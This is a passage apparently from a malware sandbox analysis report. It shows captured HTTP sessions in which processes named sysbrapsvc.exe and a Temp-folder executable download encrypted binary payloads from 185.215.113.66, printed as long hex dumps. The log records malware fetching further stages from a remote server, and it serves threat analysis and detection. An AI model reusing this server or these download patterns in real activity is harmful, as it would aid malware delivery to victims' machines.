                                                                              Data Ascii: /ymw`E;(Pv8@,S65{yasGB \e+e~!GqKw;)+UXd4lseiezy}(<vaSf>_$eRiZ(,MyrL?BtwUYPwTV/cPUfJcrd
                                                                              May 8, 2024 15:24:13.944423914 CEST1289INData Raw: 38 90 ee eb 04 9b f4 3f 3f 31 b6 f4 34 59 eb 6f 0d 53 13 67 d4 a1 dd c3 95 f8 9d 11 aa 8d 8a b2 7f b6 e2 78 a8 ff 57 39 a8 95 52 70 35 c8 b2 cf 61 5e 07 6e c8 61 4d 84 b3 92 7e 9e 09 75 d9 93 53 13 9b ee 06 d3 75 48 e5 df e6 d0 96 53 bb de 81 4a
                                                                              Data Ascii: 8??14YoSgxW9Rp5a^naM~uSuHSJD>K4!o=zxNE:Mpy?WoQ!vP8K(9G(q>.(#7W}UQ.f~MaQz\ztY7Z0}R]O$\"TjEqjZ_
                                                                              May 8, 2024 15:24:13.944467068 CEST1289INData Raw: 3e b9 6e 66 f4 fb b3 e5 57 91 84 03 4d 3c 75 8e d7 b8 2f 54 26 be a9 d1 85 0b 7e d0 0a 77 d7 05 f5 56 ae ed ef 4e de 31 b6 25 1c e8 ca be e4 f9 b8 c4 c6 5f d6 09 b9 e9 43 fa 6f 7e 6e 7e b7 96 64 d5 3c 37 b6 f3 c8 ac fe 60 12 77 27 ea 10 ec 4a 1f
                                                                              Data Ascii: >nfWM<u/T&~wVN1%_Co~n~d<7`w'JCyKx-WO)fZ<eSz1WZoE2}-S:O:yQzt{Dx/Y0_eP#81n]FaBZx4hY4PE~Z#/kdXf
                                                                              May 8, 2024 15:24:14.282414913 CEST1289INData Raw: 8b b3 71 d9 c8 da 74 f5 6d 13 ab 82 5f 0f d7 2a 75 8b dd 33 63 1c b2 7d 94 1e 26 53 ac e2 1f 13 96 62 30 be f6 91 83 88 02 53 ab 64 26 46 78 9c 5f 55 53 4e e7 85 20 bf 19 62 c8 f4 73 7a 7b f7 95 a5 e0 a7 b3 5f af 93 4b f8 e5 09 51 e9 cb 5b 41 72
                                                                              Data Ascii: qtm_*u3c}&Sb0Sd&Fx_USN bsz{_KQ[Ary#<Fc)aH|!9**kjj?1~_Lc_>c\{LY#w^1d1?2jl&.ln)(An%e{Bj<q=+nG)=W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.849751185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:16.329678059 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:16.672487020 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:16 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 15104
                                                                              Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "66299415-3b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4b e8 23 1d 0c 94 79 42 1c 1c 48 97 49 7a 96 f6 a9 d0 37 98 4e 18 a4 bf cd f5 ce 8d 00 4d 6c f6 9f 43 ea c4 50 f3 99 cb 6f 7f 29 ac 33 c1 1e 12 8e 34 8d 95 a7 ea 7c 62 91 62 10 61 f3 ab d4 6a b1 0a 3d 8c 22 70 e0 78 c2 05 ad 0c 8b 93 0b 61 d5 48 27 b5 a2 b1 76 88 94 ff 6e a7 e9 f4 c7 c3 48 3f d7 cf bd f1 a2 8e e1 3f ec 46 4f c8 b8 9d ea b3 ae d7 87 06 73 47 a9 ac 62 e9 fd b0 18 6e 84 ec 0c cc 82 c3 0f 82 5b 02 ec 9d e4 64 88 4f 2c 46 10 a4 dd 63 b7 a7 cf 5a b0 db fe 14 f8 fc 55 50 cc 7c 1d 98 b3 60 c0 ab 71 f8 25 3c 61 53 64 a0 d3 ce 2f 05 a7 f8 76 5a 2c 96 b3 67 78 59 67 17 11 7c b1 fe e0 a8 92 e8 4c 1f 74 26 fa 7b a2 02 92 bd ec 3d 08 ec f4 72 ef a3 d5 25 9e 4d 8d f4 d4 47 a5 08 6f c7 c5 f9 ab c6 e4 bc 48 81 e4 5d 23 c3 79 7c 8c fc ca 58 d2 4c 8c 18 bd e7 fe 22 4a b2 30 ad 4c 30 bd 90 e0 18 d2 77 c0 4a b1 c5 9d 03 c5 97 f3 e7 2d 46 d9 ae 13 86 5f 69 ce 8e 09 a4 95 a5 45 bb 82 e4 74 81 eb d2 3a a2 a1 37 25 c3 bc bd 85 b2 3c 84 47 5f 0e a3 fc ac d5 4b 82 de 1e ec fd 0e df 86 a8 6e 37 43 21 0d cf 8d [TRUNCATED]
                                                                              Data Ascii: K#yBHIz7NMlCPo)34|bbaj="pxaH'vnH??FOsGbn[dO,FcZUP|`q%<aSd/vZ,gxYg|Lt&{=r%MGoH]#y|XL"J0L0wJ-F_iEt:7%<G_Kn7C!XY={GRsw!0l0[!^irP:X$B(<:&axtQL[y<1:8cJi{Cw)Vx&`[gFkW?*(5pnH$~vL%i_oZ4S*~R6.0i[y ?JD!sn9a:z^Ee'4G~*ULV*<`9o8X'.63dd4kiZY!IvK<iH6HmMU>}L&0d{R!A7RZi(";b%Y.0#J2@Bs:g@h{^G<[Y/x6s*eZ8etZ=N.O`-,STepH7[:wf4kE5)Mm{:<tW;?U`y.E*0nk(D}=OLX9i,,a~pYZA/ qD_T.> [TRUNCATED]
                                                                              May 8, 2024 15:24:16.672868967 CEST1289INData Raw: b9 ec 48 5b bc 5c c5 cc 74 49 24 c8 79 28 87 7d 84 00 80 4b 76 48 a4 b5 c0 ff 47 f3 67 e3 7b 80 0f 8a 5f 14 81 b8 50 87 65 ef 85 cb 83 a1 8e f8 3c 60 82 4a 42 41 ed f5 9c d7 f1 6d 7a f0 c4 f6 40 ab 1b b9 0b a9 9f 8f 86 18 c8 d5 0d da 24 be 61 cd
                                                                              Data Ascii: H[\tI$y(}KvHGg{_Pe<`JBAmz@$a3/rB"SGAiD5#kK3"ZKD*6O(!nYA@2o<~&$PeX9As_q|0GRl'fB3CxjHgxQ|
                                                                              May 8, 2024 15:24:16.672887087 CEST1289INData Raw: 45 42 8e 2f e3 a5 18 82 da 03 3a a4 b5 2d a1 cc 37 03 69 95 7d 8f 7b 54 01 71 8e c4 3c 1f 9c 2b ad 07 75 d3 bc 03 00 7d 31 8d c5 42 72 2d 6e 86 18 0e 56 a1 80 c2 b6 5e de 4b 38 06 74 de 9d 2e 9f 49 8a 79 ba 55 46 49 9b d6 40 be 1d a1 f4 bd 0f 33
                                                                              Data Ascii: EB/:-7i}{Tq<+u}1Br-nV^K8t.IyUFI@39^+8"B;cr+=T]*:~uf+]tg]}>F.ez_4:6Mt9Lm`9xtIqMf@&/|F"PM__SEy`f'`.,c#%
                                                                              May 8, 2024 15:24:16.672931910 CEST1289INData Raw: da 8a 40 49 4a f5 3a 1a df 96 c3 5f 0b 5a fc fe 03 4c f2 79 5f f5 de 80 39 49 a1 18 82 83 a3 40 51 3b 3c fe 6c 6c 94 0c b1 5b bc 8b ed d1 7c 5e c4 2e 4e 83 35 ee 93 1e 6d f3 28 c0 26 4d 8e 20 52 43 de 37 80 2d 91 55 16 b0 af ab 19 02 2f 81 e9 0b
                                                                              Data Ascii: @IJ:_ZLy_9I@Q;<ll[|^.N5m(&M RC7-U/VgtXt@*<d5Y*K9G_2T.DsTzyH9H<">e6G{R9NzGGtjLT?+&5Ovx[~UY2&Q'de+RB
                                                                              May 8, 2024 15:24:16.672945976 CEST1289INData Raw: 01 e6 18 ad 0b 22 41 6b 9e 7f 93 1a ff da a3 28 22 08 4f 91 02 a2 0e 21 66 5b a8 47 fe a7 74 30 ea 1c 20 8a e3 83 e5 7a 80 18 1d cc 7e 49 21 86 2a 3c 44 43 ea fd 59 98 ca e1 d0 8f b5 75 78 82 8a e2 00 e7 c3 4f c9 1d f5 00 9e 8f 84 bb b8 d7 09 78
                                                                              Data Ascii: "Ak("O!f[Gt0 z~I!*<DCYuxOx+raM"/t|^0R)P?r\4=fPv59B?CYfFD9BXP?f=.<b9zjQ]N@0~wz)<;Nxh]lZxAA
                                                                              May 8, 2024 15:24:16.672959089 CEST1289INData Raw: 04 9d 4a 4c 14 24 26 c4 de 87 af 70 f7 9a db c5 37 e1 99 d6 4d 49 6e 3c ca 13 32 ce 4f c8 3d cf 9c 75 f7 39 33 ae d0 e9 2e c3 c1 27 ec 8c 48 eb bc fa 18 f5 35 d4 8d 03 53 8f b5 de 92 1f 06 92 3e 7e 86 5d b9 d8 56 a2 d8 bb 5b a8 f8 24 7c e8 af 89
                                                                              Data Ascii: JL$&p7MIn<2O=u93.'H5S>~]V[$|lHU\9UT4,pE.>xUP]&[M8umLoyUv!n<oQ(qsOLTrEkoQ6["xYN*o]82[[]hQk
                                                                              May 8, 2024 15:24:16.672972918 CEST1289INData Raw: 63 4e a9 de 95 aa 2e 7f d9 b7 ec cb 22 f6 3a f9 a9 fd 09 ba af 7a 20 26 53 5c 56 ab b4 12 a3 a3 13 92 a9 a3 b3 b7 88 24 91 fe af b7 4d 6d aa 49 bb 3b db 05 4d dd c1 9a 06 78 f9 2e 80 c3 fd ee c7 0c 12 d1 35 c3 90 49 c3 62 9c f8 2e db 66 5b 23 36
                                                                              Data Ascii: cN.":z &S\V$MmI;Mx.5Ib.f[#6uSmlBs'T,n{77=gQGvZg}_Tvr_TQ.m@e%1h&*UsK{d$kd@BX=j*,Txx.Fu)l7HG
                                                                              May 8, 2024 15:24:16.672996044 CEST1289INData Raw: a7 43 34 40 b4 d0 9d 08 a3 50 0a b7 0e 8f 75 5d a1 9d 97 cc 78 60 14 aa 50 49 87 5f 7b ea 4a 4a 04 07 48 74 6f ee a8 f8 7c 95 fb f1 67 17 5a f6 d7 f5 3c 71 da 95 45 63 ef 40 7e 70 a5 c3 5a 0f a0 c5 39 33 03 56 c5 72 f4 e3 ed 18 af cd ae e2 05 fd
                                                                              Data Ascii: C4@Pu]x`PI_{JJHto|gZ<qEc@~pZ93VrYdDP`<,8TV9qE3aiz840,pNjh,i!Q*NyWIqg6<H]DF*-wT? g
                                                                              May 8, 2024 15:24:16.673655987 CEST1289INData Raw: 8b dc 5d b4 f4 ef ae e9 8f 3d df c4 73 4c a2 43 f5 40 dd b9 c2 9e 4a ef a7 94 46 22 7e eb 9d 07 ef 56 a2 0a 91 2a 3e 19 b0 aa 70 43 27 d6 6e 17 0b 09 a8 fe 7c d8 2b 9f 53 96 84 d4 0e ff 47 5f e5 8b f2 de 76 6c 7c 3f fb 84 77 de 16 ea 81 5a 2f 57
                                                                              Data Ascii: ]=sLC@JF"~V*>pC'n|+SG_vl|?wZ/W>4I(yCg(,)=w6w{lN_D.p{_lt^cp\M?qk$^PRs+J{9{9Tx'0(an_
                                                                              May 8, 2024 15:24:16.673712969 CEST1289INData Raw: 9c f1 66 6e 7b 16 a8 3b cc a9 0c 47 ce e3 93 fd d1 ce 45 51 15 64 a0 9f 8d ee ce b2 f9 a1 2c 7b 24 b5 56 8e 26 03 64 c2 be d2 53 99 5a 89 1a eb 71 e6 8a 6a 4f dd 8a 5f 29 06 34 ae 10 9a 0f b5 2e 71 77 d3 bd 50 59 e2 bf c7 0b ed 0a b9 b6 f0 38 8f
                                                                              Data Ascii: fn{;GEQd,{$V&dSZqjO_)4.qwPY8ZW>j!3 W^aOWAnI90?R+CYwUMvW\u{ZRJXKY'vf?7%D/TH1v:R>$OB%6G"
                                                                              May 8, 2024 15:24:17.011748075 CEST1289INData Raw: cf 2f 9f 00 d6 88 6b aa cc 3c bf 1b 58 09 08 29 f2 9e 1b 4d 03 db b7 da cf 87 ba 63 2d fa 4e 97 8f 36 8e 87 c4 b1 7d 60 4d 1d 39 a5 82 8c 33 69 c1 01 64 ae f2 cc 7e 7b f5 97 a0 ce 47 0a 40 4c 55 28 fa 7a 7e a6 5d ab 44 20 19 20 11 0a 99 8e c4 a8
                                                                              Data Ascii: /k<X)Mc-N6}`M93id~{G@LU(z~]D F r3F4`e)[T!#~SK*|hr+hkvoHY=3+et8-}zg[u1!y\EpE(Ou3zC:]baAzaWk


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.849752185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:18.626554966 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:18.966797113 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:18 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:24:18.966952085 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:24:18.966968060 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:24:18.966980934 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:24:18.967149019 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:24:18.967163086 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:24:18.967175961 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:24:18.967190027 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.849753185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:19.072272062 CEST166OUTGET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:19.416872025 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:19 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 81928
                                                                              Last-Modified: Wed, 24 Apr 2024 23:29:53 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "662995f1-14008"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 f7 01 b2 60 0c 25 58 36 49 b9 34 23 91 28 4e 72 ab 02 06 2a ee b3 46 54 3e 3a 68 4e 47 4a 0c 37 91 b7 a4 1b 38 a1 9a e0 b0 c4 fe 21 20 44 58 a6 82 6d cd 53 58 f1 3b ac 19 89 a1 3d 8b 90 83 b4 71 ef eb 13 7a 28 73 20 51 f4 00 23 77 f7 2b 57 60 82 4a 56 6a 86 65 65 f4 3b 70 d7 7e e1 94 a3 80 aa 9f 61 33 fa c2 5f 90 b0 88 84 2c b5 14 92 38 68 0a 3a f6 a8 e8 70 3c 63 fa 87 27 43 2b f1 17 2e 48 bc 40 39 94 d5 09 2e 37 61 67 27 e3 d9 d7 11 b1 73 b6 44 ee a1 48 67 ce 3b 0d 47 de 6c 49 99 78 8e 32 06 7e cb 06 99 e2 8b b5 22 65 91 47 ca 9b f4 f8 70 e1 34 32 30 ab 66 24 ff 18 2d 2a ab a4 8e 3e 8f 4e 6f f9 37 ff 23 0c bf fa 23 74 76 8a c0 5b 91 ba 64 3c ba 64 84 a9 8a 05 47 f3 ae 16 c6 d5 ac f8 f2 e3 22 12 89 76 35 e9 23 19 da 63 c6 f6 7c eb 00 02 5d a9 90 93 72 c1 57 89 70 e8 c7 c7 ff 7e f7 25 72 e0 5b 68 5a 13 5f db 38 e3 e0 b0 df b4 6c f2 6c 3f 6c 32 2c 82 bf c0 0e 20 00 01 74 e7 94 6e d0 d7 31 4b fa 19 92 fa 71 85 57 70 41 0d c0 65 20 72 73 20 94 9c e7 af b6 92 a0 3f 21 39 04 9a db [TRUNCATED]
                                                                              Data Ascii: NGS!`%X6I4#(Nr*FT>:hNGJ78! DXmSX;=qz(s Q#w+W`JVjee;p~a3_,8h:p<c'C+.H@9.7ag'sDHg;GlIx2~"eGp420f$-*>No7##tv[d<dG"v5#c|]rWp~%r[hZ_8ll?l2, tn1KqWpAe rs ?!9s,i}G:x} M]:wTU+v*@V-7m+j!LqmJmVHiYHq[JG1j\Z+J2[?#fzYV"9(UWIJ's-OW`o0pmRVaj;wm57*iWysesZ5{(|+tDo>DQbd.W}@^=w%}C?2EN4jfi/kOppZ6I$aJ_/028M*J0y!=g[v]c@9d^H2~l(pc-'7JagPYP.mt&/btva}gfu;'Z~[Vn~5RkM@q/:=`:G^'CT<Czv`b=/>&-U|pjM,/fWO4]9D-\F'bOQW`6sb_ [TRUNCATED]
                                                                              May 8, 2024 15:24:19.417135954 CEST1289INData Raw: 28 55 b0 14 8d 25 75 01 4e 4d c0 61 ac 41 b4 b2 02 db 28 1b 34 b9 e4 3d 5a ba a7 41 58 c9 72 51 09 58 06 57 a5 6a 1d a6 dc db 3c 54 91 a4 f0 53 ee c7 b4 4c 31 29 c9 3b 7d 28 06 68 a2 46 ea 8f 96 45 61 a0 bd ec 9d 9e b3 9f b9 6f db 99 91 9e cc ab
                                                                              Data Ascii: (U%uNMaA(4=ZAXrQXWj<TSL1);}(hFEao@@s3poh[Z6~E7Y\YdQ87$>/v2/'jIA*i$ZtBa4PdG5KQ^(,q{:)CYd;}U:
                                                                              May 8, 2024 15:24:19.417484045 CEST1289INData Raw: 73 80 0b b2 b8 b4 ed b4 ec 6c 6e 29 64 94 41 b8 c2 5b fe a0 26 a2 02 7f 86 2b d0 b5 9d 1b c4 eb 99 d1 84 a5 c4 9b e4 4a 3f ae 54 38 64 fd 73 7b bc b0 b7 f7 35 22 98 66 d9 e0 9c 2c 14 4c 63 dd 51 30 2a 35 e5 bd c5 71 38 09 82 3b 49 c8 cb 06 d7 be
                                                                              Data Ascii: sln)dA[&+J?T8ds{5"f,LcQ0*5q8;IW5F_E,`uvybARUBv@5:{sU~wLFy~I3z?>Twh,GY(@5D?39wne5Fud!Ji
                                                                              May 8, 2024 15:24:19.417573929 CEST1289INData Raw: c4 bb 2d ef 3e bc d7 cf 85 b5 61 42 c9 31 64 7b 11 00 a5 c9 ec bc 34 06 66 4e 0f 74 8f 73 02 53 34 4b 68 9c c2 bc c8 87 b4 4d 97 89 8e b7 7d ce 64 8b 08 fe a7 b9 04 ca a1 ad e8 0e 46 11 2f 0b 88 83 36 8f a2 c3 5b d6 10 ae bb 3d d8 38 cf 91 4f ed
                                                                              Data Ascii: ->aB1d{4fNtsS4KhM}dF/6[=8O^b$/lb8nfD;AzN=O'F+~gV#q*(*(%d]d!E)xJ:.Ku[_ofLVQiGA*x
                                                                              May 8, 2024 15:24:19.417593956 CEST1289INData Raw: 47 61 a6 d7 8b e2 18 06 d4 a0 0f 77 f1 a8 b0 18 f4 e7 aa e1 f4 10 d3 6c 24 a6 92 4a 95 43 61 2d 33 b6 ea 6c 67 db 6c f1 95 8b c3 ca 0a d3 82 4b 20 b2 2c 8a 71 ed 28 57 22 b0 3e cf fd 51 37 9e 01 db db 71 df 58 6e e1 04 c1 79 7e b7 1d e7 32 64 68
                                                                              Data Ascii: Gawl$JCa-3lglK ,q(W">Q7qXny~2dhr.1N5dN]YIZ]svq|1bT0T2L>Kk`]H4X"kD/e6o[&/RcKT_N`MGmtocl;-EH-t JbB
                                                                              May 8, 2024 15:24:19.417608023 CEST1289INData Raw: 19 15 22 5a d7 57 6d 08 b4 ae a5 2d 9c 05 b2 e7 76 a1 88 d8 95 a0 92 12 78 8c 9e 84 bb 25 c3 0e ea 62 c0 e8 67 46 ce f2 85 e2 86 aa 56 e3 03 22 c9 e8 1c d4 fd 1d f3 66 d5 d2 6e a9 8f db d2 fb 8e 6c 5a 7c e2 ea 43 e3 75 e5 ab 3a 6b 8b 08 76 b5 e4
                                                                              Data Ascii: "ZWm-vx%bgFV"fnlZ|Cu:kvG\Cd!9s$Wvbc{Lz4p%+2&m=J LE9Kl64H"~c/`J'tSy
                                                                              May 8, 2024 15:24:19.417623043 CEST1289INData Raw: cf ac a7 be eb 73 e4 d3 ed 5b 03 72 0a 74 77 67 b8 06 90 b3 68 26 cd 09 26 77 da e1 de 04 4a 31 c4 2a f5 4e d0 17 74 d1 64 56 8a 35 52 8e a2 c2 49 84 cb d5 ba 8a de 29 c8 64 33 1d ea 1f 9d 54 a4 dc a7 44 ad 90 58 ad 3d ed d8 e9 11 8b bf 96 37 2b
                                                                              Data Ascii: s[rtwgh&&wJ1*NtdV5RI)d3TDX=7+_TDx*dMT&J&XhG0{lwY]u</08I}F?yJxis}{2?FqiI]'Vv0KK'C_`B/E$=k5\$8
                                                                              May 8, 2024 15:24:19.417638063 CEST1289INData Raw: 18 ea 62 90 fb d4 85 d0 ad 0c ca 89 b2 53 60 05 7d 76 96 c6 1b 11 21 ee b4 7a fb 80 51 ed f3 ab 53 d4 03 87 1e e5 51 de b5 72 0c 29 40 27 ef fe 36 61 96 0b 02 9b d9 49 77 04 7e 0b be 98 bd b5 4e 86 ad 27 41 28 99 57 26 9d c5 79 01 3f 69 69 0b 0e
                                                                              Data Ascii: bS`}v!zQSQr)@'6aIw~N'A(W&y?iiz$X2Wq&44o#H<uwV5pWv;}]rxsi3}'/_:4!0EUD7H\l9B-uLr3%3)"iKYw_3b1!]/
                                                                              May 8, 2024 15:24:19.417654037 CEST1289INData Raw: 98 f8 17 51 a5 46 a9 06 8f 70 7e d1 56 4e 09 36 93 48 63 2d e4 5e 59 fe 7f d8 01 fc 73 11 04 eb 66 af 5f 05 e8 fa 5e 30 56 18 e8 12 c0 d7 0f 05 48 45 9f 97 4f b9 c8 ba a5 74 d5 06 3f 27 fd 27 2d af 17 cb 93 d8 14 f2 53 f2 fa 4e 30 b9 7c 59 d9 07
                                                                              Data Ascii: QFp~VN6Hc-^Ysf_^0VHEOt?''-SN0|Ye"I@/&'pz251my 50Ki8HP38FG^ZOEV-sOSBSp1@JlgTJrJg6gGwE\Wg
                                                                              May 8, 2024 15:24:19.417668104 CEST1289INData Raw: 41 d9 38 85 ee da 1f 10 58 78 ef c3 e6 5f 03 31 de e6 ca fb a1 25 b6 07 9d 1b b2 31 a6 4b f2 95 cf 45 5a 45 f9 ea 7f ba c1 4d b7 5b d9 ed 98 aa 58 ac f9 58 2c a7 8c 2a c0 64 76 05 f9 ea 6b 0c 6e a7 cc 9f 95 3a 5f 91 fe 5f 03 e9 99 02 db a3 ae cd
